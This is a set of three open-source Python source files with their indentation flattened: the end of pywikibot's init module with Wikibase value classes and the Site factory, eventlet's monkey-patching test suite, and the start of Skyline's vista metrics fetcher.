if isinstance(value, Decimal):
return value
if value is None:
return None
return Decimal(str(value))
@staticmethod
def _fromdecimal(value: Decimal) -> Optional[str]:
"""
Convert a Decimal to a string representation suitable for WikiBase.
None value is returned as is.
@param value: decimal number to convert
"""
if value is None:
return None
return format(value, '+g')
def __init__(self, amount, unit=None, error=None,
site: Optional[DataSite] = None):
"""
Create a new WbQuantity object.
@param amount: number representing this quantity
@type amount: str or Decimal. Other types are accepted, and
converted via str to Decimal.
@param unit: the Wikibase item for the unit or the entity URI of this
Wikibase item.
@type unit: pywikibot.ItemPage, str or None
@param error: the uncertainty of the amount (e.g. ±1)
@type error: same as amount, or tuple of two values, where the first
value is the upper error and the second is the lower error value.
@param site: The Wikibase site
"""
if amount is None:
raise ValueError('no amount given')
self.amount = self._todecimal(amount)
self._unit = unit
self.site = site or Site().data_repository()
# also allow entity URIs to be provided via unit parameter
if isinstance(unit, str) \
and unit.partition('://')[0] not in ('http', 'https'):
raise ValueError("'unit' must be an ItemPage or entity uri.")
if error is None and not self._require_errors(site):
self.upperBound = self.lowerBound = None
else:
if error is None:
upperError = lowerError = Decimal(0)
elif isinstance(error, tuple):
upperError = self._todecimal(error[0])
lowerError = self._todecimal(error[1])
else:
upperError = lowerError = self._todecimal(error)
self.upperBound = self.amount + upperError
self.lowerBound = self.amount - lowerError
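    # Illustrative bounds handling:
    #   WbQuantity(5, error=1)      -> upperBound 6, lowerBound 4
    #   WbQuantity(5, error=(1, 2)) -> upperBound 6, lowerBound 3
    #   WbQuantity(5)               -> both bounds None (site permitting)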
@property
def unit(self):
"""Return _unit's entity uri or '1' if _unit is None."""
if isinstance(self._unit, ItemPage):
return self._unit.concept_uri()
return self._unit or '1'
def get_unit_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the unit.
Note that the unit need not be in the same data repository as the
WbQuantity itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the unit, if different from that
provided with the WbQuantity.
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@return: pywikibot.ItemPage
"""
if not isinstance(self._unit, str):
return self._unit
repo = repo or self.site
self._unit = ItemPage.from_entity_uri(repo, self._unit, lazy_load)
return self._unit
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
"""
json = {'amount': self._fromdecimal(self.amount),
'upperBound': self._fromdecimal(self.upperBound),
'lowerBound': self._fromdecimal(self.lowerBound),
'unit': self.unit
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbQuantity from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@param site: The Wikibase site
@rtype: pywikibot.WbQuantity
"""
amount = cls._todecimal(wb['amount'])
upperBound = cls._todecimal(wb.get('upperBound'))
lowerBound = cls._todecimal(wb.get('lowerBound'))
bounds_provided = (upperBound is not None and lowerBound is not None)
error = None
if bounds_provided or cls._require_errors(site):
error = (upperBound - amount, amount - lowerBound)
if wb['unit'] == '1':
unit = None
else:
unit = wb['unit']
return cls(amount, unit, error, site)
class WbMonolingualText(_WbRepresentation):
"""A Wikibase monolingual text representation."""
_items = ('text', 'language')
def __init__(self, text: str, language: str):
"""
Create a new WbMonolingualText object.
@param text: text string
@param language: language code of the string
"""
if not text or not language:
raise ValueError('text and language cannot be empty')
self.text = text
self.language = language
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
"""
json = {'text': self.text,
'language': self.language
}
return json
@classmethod
def fromWikibase(cls, wb: dict):
"""
Create a WbMonolingualText from the JSON data given by Wikibase API.
@param wb: Wikibase JSON
@rtype: pywikibot.WbMonolingualText
"""
return cls(wb['text'], wb['language'])
class _WbDataPage(_WbRepresentation):
"""
A Wikibase representation for data pages.
A temporary implementation until T162336 has been resolved.
Note that this class cannot be used directly
"""
_items = ('page', )
@classmethod
def _get_data_site(cls, repo_site: DataSite) -> APISite:
"""
Return the site serving as a repository for a given data type.
Must be implemented in the extended class.
@param repo_site: The Wikibase site
"""
raise NotImplementedError
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for a given data type.
Must be implemented in the extended class.
The dict should have three keys:
* ending: str, required filetype-like ending in page titles.
* label: str, describing the data type for use in error messages.
* data_site: APISite, site serving as a repository for
the given data type.
@param site: The Wikibase site
"""
raise NotImplementedError
@staticmethod
def _validate(page, data_site, ending: str, label: str):
"""
Validate the provided page against general and type specific rules.
@param page: Page containing the data.
@type page: pywikibot.Page
@param data_site: The site serving as a repository for the given
data type.
@type data_site: APISite
@param ending: Required filetype-like ending in page titles.
E.g. '.map'
@param label: Label describing the data type in error messages.
"""
if not isinstance(page, Page):
raise ValueError(
'Page {} must be a pywikibot.Page object not a {}.'
.format(page, type(page)))
# validate page exists
if not page.exists():
raise ValueError('Page {} must exist.'.format(page))
# validate page is on the right site, and that site supports the type
if not data_site:
raise ValueError(
'The provided site does not support {0}.'.format(label))
if page.site != data_site:
raise ValueError(
'Page must be on the {0} repository site.'.format(label))
# validate page title fulfills hard-coded Wikibase requirement
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.map$/u' for geo-shape
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.tab$/u' for tabular-data
# As we have already checked for existence the following simplified
# check should be enough.
if not page.title().startswith('Data:') \
or not page.title().endswith(ending):
raise ValueError(
"Page must be in 'Data:' namespace and end in '{0}' "
'for {1}.'.format(ending, label))
def __init__(self, page, site: Optional[DataSite] = None):
"""
Create a new _WbDataPage object.
@param page: page containing the data
@type page: pywikibot.Page
@param site: The Wikibase site
"""
site = site or Site().data_repository()
specifics = type(self)._get_type_specifics(site)
_WbDataPage._validate(page, specifics['data_site'],
specifics['ending'], specifics['label'])
self.page = page
def __hash__(self):
"""Override super.hash() as toWikibase is a string for _WbDataPage."""
return hash(self.toWikibase())
def toWikibase(self) -> str:
"""
Convert the data to the value required by the Wikibase API.
@return: title of the data page incl. namespace
"""
return self.page.title()
@classmethod
def fromWikibase(cls, page_name: str, site: DataSite):
"""
Create a _WbDataPage from the JSON data given by the Wikibase API.
@param page_name: page name from Wikibase value
@param site: The Wikibase site
@rtype: pywikibot._WbDataPage
"""
data_site = cls._get_data_site(site)
page = Page(data_site, page_name)
return cls(page, site)
class WbGeoShape(_WbDataPage):
"""A Wikibase geo-shape representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a geo-shape repository.
@param site: The Wikibase site
"""
return site.geo_shape_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbGeoShape.
@param site: The Wikibase site
"""
specifics = {
'ending': '.map',
'label': 'geo-shape',
'data_site': cls._get_data_site(site)
}
return specifics
class WbTabularData(_WbDataPage):
"""A Wikibase tabular-data representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a tabular-data repository.
@param site: The Wikibase site
"""
return site.tabular_data_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbTabularData.
@param site: The Wikibase site
"""
specifics = {
'ending': '.tab',
'label': 'tabular-data',
'data_site': cls._get_data_site(site)
}
return specifics
class WbUnknown(_WbRepresentation):
"""
A Wikibase representation for unknown data type.
This will prevent the bot from breaking completely when a new type
is introduced.
This data type is just a json container
"""
_items = ('json',)
def __init__(self, json):
"""
Create a new WbUnknown object.
@param json: Wikibase JSON
"""
self.json = json
def toWikibase(self) -> dict:
"""
Return the JSON object for the Wikibase API.
@return: Wikibase JSON
"""
return self.json
@classmethod
def fromWikibase(cls, json: dict):
"""
Create a WbUnknown from the JSON data given by the Wikibase API.
@param json: Wikibase JSON
@rtype: pywikibot.WbUnknown
"""
return cls(json)
_sites = {}
@cache
def _code_fam_from_url(url: str, name: Optional[str] = None):
"""Set url to cache and get code and family from cache.
Site helper method.
@param url: The site URL to get code and family
@param name: A family name used by AutoFamily
"""
matched_sites = []
# Iterate through all families and look, which does apply to
# the given URL
for fam in config.family_files:
family = Family.load(fam)
code = family.from_url(url)
if code is not None:
matched_sites.append((code, family))
if not matched_sites:
if not name: # create a name from url
name = urlparse(url).netloc.split('.')[-2]
name = removesuffix(name, 'wiki')
family = AutoFamily(name, url)
matched_sites.append((family.code, family))
if len(matched_sites) > 1:
warning('Found multiple matches for URL "{}": {} (use first)'
.format(url, ', '.join(str(s) for s in matched_sites)))
return matched_sites[0]
@_deprecate_arg('sysop', None)
def Site(code: Optional[str] = None, fam=None, user: Optional[str] = None, *,
interface=None,
url: Optional[str] = None) -> Union[APISite, DataSite, ClosedSite]:
"""A factory method to obtain a Site object.
Site objects are cached and reused by this method.
By default rely on config settings. These defaults may all be overridden
using the method parameters.
@param code: language code (override config.mylang)
code may also be a sitename like 'wikipedia:test'
@param fam: family name or object (override config.family)
@type fam: str or pywikibot.family.Family
@param user: bot user name to use on this site (override config.usernames)
@param interface: site class or name of class in pywikibot.site
(override config.site_interface)
@type interface: subclass of L{pywikibot.site.BaseSite} or string
@param url: Instead of code and fam, does try to get a Site based on the
URL. Still requires that the family supporting that URL exists.
@raises ValueError: URL and pair of code and family given
@raises ValueError: Invalid interface name
"""
_logger = 'wiki'
if url:
# Either code and fam or url with optional fam for AutoFamily name
if code:
raise ValueError(
'URL to the wiki OR a pair of code and family name '
'should be provided')
code, fam = _code_fam_from_url(url, fam)
elif code and ':' in code:
if fam:
raise ValueError(
'sitename OR a pair of code and family name '
'should be provided')
fam, _, code = code.partition(':')
else:
# Fallback to config defaults
code = code or config.mylang
fam = fam or config.family
if not isinstance(fam, Family):
fam = Family.load(fam)
interface = interface or fam.interface(code)
# config.usernames is initialised with a defaultdict for each family name
family_name = str(fam)
code_to_user = {}
if '*' in config.usernames: # T253127: usernames is a defaultdict
code_to_user = config.usernames['*'].copy()
code_to_user.update(config.usernames[family_name])
user = user or code_to_user.get(code) or code_to_user.get('*')
if not isinstance(interface, type):
# If it isn't a class, assume it is a string
try:
tmp = __import__('pywikibot.site', fromlist=[interface])
except ImportError:
raise ValueError('Invalid interface name: {0}'.format(interface))
else:
interface = getattr(tmp, interface)
if not issubclass(interface, BaseSite):
warning('Site called with interface=%s' % interface.__name__)
user = normalize_username(user)
key = '%s:%s:%s:%s' % (interface.__name__, fam, code, user)
if key not in _sites or not isinstance(_sites[key], interface):
_sites[key] = interface(code=code, fam=fam, user=user)
debug("Instantiated %s object '%s'"
% (interface.__name__, _sites[key]), _logger)
if _sites[key].code != code:
warn('Site %s instantiated using different code "%s"'
% (_sites[key], code), UserWarning, 2)
return _sites[key]
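# Usage sketch (illustrative):
#     >>> Site('en', 'wikipedia')      # explicit code and family
#     >>> Site('wikipedia:en')         # sitename form, equivalent
#     >>> Site(url='https://en.wikipedia.org/w/index.php')  # resolved by family.from_url()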
# alias for backwards-compatibility
getSite = redirect_func(Site, old_name='getSite', since='20150924',
future_warning=True)
# These imports depend on Wb* classes above.
from pywikibot.page import ( # noqa: E402
Page,
FilePage,
Category,
Link,
SiteLink,
User,
ItemPage,
PropertyPage,
Claim,
)
from pywikibot.page import ( # noqa: E402
html2unicode, url2unicode, unicode2html)
link_regex = re.compile(r'\[\[(?P<title>[^\]|[<>{}]*)(\|.*?)?\]\]')
def showDiff(oldtext, newtext, context=0):
"""
Output a string showing the differences between oldtext and newtext.
The differences are highlighted (only on compatible systems) to show which
changes were made.
"""
PatchManager(oldtext, newtext, context=context).print_hunks()
# Throttle and thread handling
def sleep(secs):
"""Suspend execution of the current thread for the given number of seconds.
Drop this process from the throttle log if wait time is greater than
30 seconds.
"""
if secs >= 30:
stopme()
time.sleep(secs)
def stopme():
"""
Drop this process from the throttle log, after pending threads finish.
Can be called manually if desired. Does not clean async_manager.
This should be run when a bot does not interact with the Wiki, or
when it has stopped doing so. After a bot has run stopme() it will
not slow down other bots any more.
"""
_flush(False)
def _flush(stop=True):
"""
Drop this process from the throttle log, after pending threads finish.
Wait for the page-putter to flush its queue. Also drop this process from
the throttle log. Called automatically at Python exit.
"""
_logger = 'wiki'
debug('_flush() called', _logger)
def remaining():
remainingPages = page_put_queue.qsize()
if stop:
# -1 because we added a None element to stop the queue
remainingPages -= 1
remainingSeconds = datetime.timedelta(
seconds=round(remainingPages * config.put_throttle))
return (remainingPages, remainingSeconds)
if stop:
# None task element leaves async_manager
page_put_queue.put((None, [], {}))
num, sec = remaining()
if num > 0 and sec.total_seconds() > config.noisysleep:
output(color_format(
'{lightblue}Waiting for {num} pages to be put. '
'Estimated time remaining: {sec}{default}', num=num, sec=sec))
if _putthread is not threading.current_thread():
while (_putthread.is_alive()
and (page_put_queue.qsize() > 0
or page_put_queue_busy.qsize() > 0)):
try:
_putthread.join(1)
except KeyboardInterrupt:
if input_yn('There are {} pages remaining in the queue. '
'Estimated time remaining: {}\nReally exit?'
.format(*remaining()),
default=False, automatic_quit=False):
break
# only need one drop() call because all throttles use the same global pid
with suppress(IndexError):
list(_sites.values())[0].throttle.drop()
log('Dropped throttle(s).')
atexit.register(_flush)
# Create a separate thread for asynchronous page saves (and other requests)
def async_manager():
"""Daemon; take requests from the queue and execute them in background."""
while True:
(request, args, kwargs) = page_put_queue.get()
page_put_queue_busy.put(None)
if request is None:
break
request(*args, **kwargs)
page_put_queue.task_done()
page_put_queue_busy.get()
def async_request(request, *args, **kwargs):
"""Put a request on the queue, and start the daemon if necessary."""
if not _putthread.is_alive():
try:
page_put_queue.mutex.acquire()
with suppress(AssertionError, RuntimeError):
_putthread.start()
finally:
page_put_queue.mutex.release()
page_put_queue.put((request, args, kwargs))
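# Illustrative (hypothetical call): async_request(page.save, summary='x')
# queues the save; async_manager drains the queue on _putthread, and
# _flush() waits for it at interpreter exit.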
# queue to hold pending requests
page_put_queue = Queue(config.max_queue_size)
# queue to signal that async_manager is working on a request. See T147178.
page_put_queue_busy = Queue(config.max_queue_size)
# set up the background thread
_putthread = threading.Thread(target=async_manager)
# identification for debugging purposes
_putthread.setName('Put-Thread')
_putthread.setDaemon(True)
wrapper = _ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr(
'QuitKeyboardInterrupt', _QuitKeyboardInterrupt,
warning_message='pywikibot.QuitKeyboardInterrupt is deprecated; '
'use pywikibot.bot.QuitKeyboardInterrupt instead.',
since='20150619', future_warning=True)
wrapper._add_deprecated_attr(
'MediaWikiVersion', _MediaWikiVersion,
warning_message='pywikibot.MediaWikiVersion is deprecated; '
'use pywikibot.tools.MediaWikiVersion instead.',
since='20180827')
wrapper._add_deprecated_attr('__release__', __version__,
replacement_name='pywikibot.__version__',
since='20200707')
wrapper._add_deprecated_attr('showHelp', show_help,
since='20200705', future_warning=True)
|
patcher_test.py
|
import os
import shutil
import sys
import tempfile
import six
import tests
base_module_contents = """
import socket
import urllib
print("base {0} {1}".format(socket, urllib))
"""
patching_module_contents = """
from eventlet.green import socket
from eventlet.green import urllib
from eventlet import patcher
print('patcher {0} {1}'.format(socket, urllib))
patcher.inject('base', globals(), ('socket', socket), ('urllib', urllib))
del patcher
"""
import_module_contents = """
import patching
import socket
print("importing {0} {1} {2} {3}".format(patching, socket, patching.socket, patching.urllib))
"""
class ProcessBase(tests.LimitedTestCase):
TEST_TIMEOUT = 3 # starting processes is time-consuming
def setUp(self):
super(ProcessBase, self).setUp()
self._saved_syspath = sys.path
self.tempdir = tempfile.mkdtemp('_patcher_test')
def tearDown(self):
super(ProcessBase, self).tearDown()
sys.path = self._saved_syspath
shutil.rmtree(self.tempdir)
def write_to_tempfile(self, name, contents):
filename = os.path.join(self.tempdir, name)
if not filename.endswith('.py'):
filename = filename + '.py'
with open(filename, "w") as fd:
fd.write(contents)
def launch_subprocess(self, filename):
path = os.path.join(self.tempdir, filename)
output = tests.run_python(path)
if six.PY3:
output = output.decode('utf-8')
separator = '\n'
else:
separator = b'\n'
lines = output.split(separator)
return output, lines
def run_script(self, contents, modname=None):
if modname is None:
modname = "testmod"
self.write_to_tempfile(modname, contents)
return self.launch_subprocess(modname)
class ImportPatched(ProcessBase):
def test_patch_a_module(self):
self.write_to_tempfile("base", base_module_contents)
self.write_to_tempfile("patching", patching_module_contents)
self.write_to_tempfile("importing", import_module_contents)
output, lines = self.launch_subprocess('importing.py')
assert lines[0].startswith('patcher'), repr(output)
assert lines[1].startswith('base'), repr(output)
assert lines[2].startswith('importing'), repr(output)
assert 'eventlet.green.socket' in lines[1], repr(output)
assert 'eventlet.green.urllib' in lines[1], repr(output)
assert 'eventlet.green.socket' in lines[2], repr(output)
assert 'eventlet.green.urllib' in lines[2], repr(output)
assert 'eventlet.green.httplib' not in lines[2], repr(output)
def test_import_patched_defaults():
tests.run_isolated('patcher_import_patched_defaults.py')
def test_import_patched_handles_sub_modules():
tests.run_isolated('test_sub_module_in_import_patched/test.py')
class MonkeyPatch(ProcessBase):
def test_patched_modules(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import socket
try:
import urllib.request as urllib
except ImportError:
import urllib
print("newmod {0} {1}".format(socket.socket, urllib.socket.socket))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[0].startswith('newmod'), repr(output)
self.assertEqual(lines[0].count('GreenSocket'), 2, repr(output))
def test_early_patching(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import eventlet
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_late_patching(self):
new_mod = """
import eventlet
eventlet.sleep(0.01)
from eventlet import patcher
patcher.monkey_patch()
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_typeerror(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch(finagle=True)
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[-2].startswith('TypeError'), repr(output)
assert 'finagle' in lines[-2], repr(output)
def assert_boolean_logic(self, call, expected, not_expected=''):
expected_list = ", ".join(['"%s"' % x for x in expected.split(',') if len(x)])
not_expected_list = ", ".join(['"%s"' % x for x in not_expected.split(',') if len(x)])
new_mod = """
from eventlet import patcher
%s
for mod in [%s]:
assert patcher.is_monkey_patched(mod), mod
for mod in [%s]:
assert not patcher.is_monkey_patched(mod), mod
print("already_patched {0}".format(",".join(sorted(patcher.already_patched.keys()))))
""" % (call, expected_list, not_expected_list)
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
ap = 'already_patched'
assert lines[0].startswith(ap), repr(output)
patched_modules = lines[0][len(ap):].strip()
# psycopg might or might not be patched based on installed modules
patched_modules = patched_modules.replace("psycopg,", "")
# ditto for MySQLdb
patched_modules = patched_modules.replace("MySQLdb,", "")
self.assertEqual(
patched_modules, expected,
"Logic:%s\nExpected: %s != %s" % (call, expected, patched_modules))
def test_boolean(self):
self.assert_boolean_logic("patcher.monkey_patch()",
'os,select,socket,subprocess,thread,time')
def test_boolean_all(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_single(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True, socket=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_negative(self):
self.assert_boolean_logic(
"patcher.monkey_patch(all=False, socket=False, select=True)",
'select')
def test_boolean_single(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True)",
'socket')
def test_boolean_double(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True, select=True)",
'select,socket')
def test_boolean_negative(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False)",
'os,select,subprocess,thread,time')
def test_boolean_negative2(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, time=False)",
'os,select,subprocess,thread')
def test_conflicting_specifications(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, select=True)",
'select')
test_monkey_patch_threading = """
def test_monkey_patch_threading():
tickcount = [0]
def tick():
import six
for i in six.moves.range(1000):
tickcount[0] += 1
eventlet.sleep()
def do_sleep():
tpool.execute(time.sleep, 0.5)
eventlet.spawn(tick)
w1 = eventlet.spawn(do_sleep)
w1.wait()
print(tickcount[0])
assert tickcount[0] > 900
tpool.killall()
"""
class Tpool(ProcessBase):
TEST_TIMEOUT = 3
@tests.skip_with_pyevent
def test_simple(self):
new_mod = """
import eventlet
from eventlet import patcher
patcher.monkey_patch()
from eventlet import tpool
print("newmod {0}".format(tpool.execute(len, "hi")))
print("newmod {0}".format(tpool.execute(len, "hi2")))
tpool.killall()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, output)
assert lines[0].startswith('newmod'), repr(output)
assert '2' in lines[0], repr(output)
assert '3' in lines[1], repr(output)
@tests.skip_with_pyevent
def test_unpatched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=False)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, lines)
@tests.skip_with_pyevent
def test_patched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=True)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
def test_subprocess_after_monkey_patch():
code = '''\
import sys
import eventlet
eventlet.monkey_patch()
from eventlet.green import subprocess
subprocess.Popen([sys.executable, '-c', ''], stdin=subprocess.PIPE).wait()
print('pass')
'''
output = tests.run_python(
path=None,
args=['-c', code],
)
assert output.rstrip() == b'pass'
class Threading(ProcessBase):
def test_orig_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import patcher
import threading
_threading = patcher.original('threading')
def test():
print(repr(threading.currentThread()))
t = _threading.Thread(target=test)
t.start()
t.join()
print(len(threading._active))
print(len(_threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 4, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
assert lines[1] == '1', lines
assert lines[2] == '1', lines
def test_tpool(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import tpool
import threading
def test():
print(repr(threading.currentThread()))
tpool.execute(test)
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenlet(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import event
import threading
evt = event.Event()
def test():
print(repr(threading.currentThread()))
evt.send()
eventlet.spawn_n(test)
evt.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_MainThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenthread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
import threading
def test():
print(repr(threading.currentThread()))
t = eventlet.spawn(test)
t.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_keyerror(self):
new_mod = """import eventlet
eventlet.monkey_patch()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 1, "\n".join(lines))
class Os(ProcessBase):
def test_waitpid(self):
new_mod = """import subprocess
import eventlet
eventlet.monkey_patch(all=False, os=True)
process = subprocess.Popen("sleep 0.1 && false", shell=True)
print(process.wait())"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
self.assertEqual('1', lines[0], repr(output))
class GreenThreadWrapper(ProcessBase):
prologue = """import eventlet
eventlet.monkey_patch()
import threading
def test():
t = threading.currentThread()
"""
epilogue = """
t = eventlet.spawn(test)
t.wait()
"""
def test_join(self):
self.write_to_tempfile("newmod", self.prologue + """
def test2():
global t2
t2 = threading.currentThread()
eventlet.spawn(test2)
""" + self.epilogue + """
print(repr(t2))
t2.join()
""")
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
def test_name(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.name)
print(t.getName())
print(t.get_name())
t.name = 'foo'
print(t.name)
print(t.getName())
print(t.get_name())
t.setName('bar')
print(t.name)
print(t.getName())
print(t.get_name())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 10, "\n".join(lines))
for i in range(0, 3):
self.assertEqual(lines[i], "GreenThread-1", lines[i])
for i in range(3, 6):
self.assertEqual(lines[i], "foo", lines[i])
for i in range(6, 9):
self.assertEqual(lines[i], "bar", lines[i])
def test_ident(self):
self.write_to_tempfile("newmod", self.prologue + """
print(id(t._g))
print(t.ident)
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], lines[1])
def test_is_alive(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_alive())
print(t.isAlive())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_is_daemon(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_daemon())
print(t.isDaemon())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_patcher_existing_locks_early():
tests.run_isolated('patcher_existing_locks_early.py')
def test_patcher_existing_locks_late():
tests.run_isolated('patcher_existing_locks_late.py')
def test_patcher_existing_locks_locked():
tests.run_isolated('patcher_existing_locks_locked.py')
@tests.skip_if_CRLock_exist
def test_patcher_existing_locks_unlocked():
tests.run_isolated('patcher_existing_locks_unlocked.py')
def test_importlib_lock():
tests.run_isolated('patcher_importlib_lock.py')
def test_threading_condition():
tests.run_isolated('patcher_threading_condition.py')
def test_threading_join():
tests.run_isolated('patcher_threading_join.py')
def test_socketserver_selectors():
tests.run_isolated('patcher_socketserver_selectors.py')
def test_blocking_select_methods_are_deleted():
tests.run_isolated('patcher_blocking_select_methods_are_deleted.py')
def test_regular_file_readall():
tests.run_isolated('regular_file_readall.py')
def test_threading_current():
tests.run_isolated('patcher_threading_current.py')
|
fetcher.py
|
from __future__ import division
import logging
from time import time, sleep
from datetime import datetime, timedelta
from threading import Thread
from multiprocessing import Process
import os
# @modified 20191115 - Branch #3262: py3
# from os import kill, getpid
from os import kill
import traceback
import re
from sys import version_info
import os.path
from ast import literal_eval
try:
from urllib.parse import quote
except:
from urllib import quote
# @modified 20191115 - Branch #3262: py3
# from redis import StrictRedis
import requests
import settings
python_version = int(version_info[0])
if True:
from skyline_functions import (
send_graphite_metric, filesafe_metricname,
# @added 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
get_redis_conn, get_redis_conn_decoded,
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitise_graphite_url)
parent_skyline_app = 'vista'
child_skyline_app = 'fetcher'
skyline_app_logger = '%sLog' % parent_skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app = '%s.%s' % (parent_skyline_app, child_skyline_app)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, parent_skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
skyline_app_graphite_namespace = 'skyline.%s%s.fetcher' % (
parent_skyline_app, SERVER_METRIC_PATH)
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
VISTA_ENABLED = settings.VISTA_ENABLED
except:
VISTA_ENABLED = False
# @added 20210512 - Feature #4064: VERBOSE_LOGGING
try:
VERBOSE_LOGGING = settings.VISTA_VERBOSE_LOGGING
except:
VERBOSE_LOGGING = False
USE_FLUX = False
LOCAL_DEBUG = False
class Fetcher(Thread):
"""
The fetcher thread retrieves the latest data points for metrics from
multiple endpoints (via requests, in worker processes) and submits the
data to the Redis set, vista.fetcher.metrics.json for the worker to process.
"""
def __init__(self, parent_pid):
super(Fetcher, self).__init__()
self.parent_pid = parent_pid
self.daemon = True
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
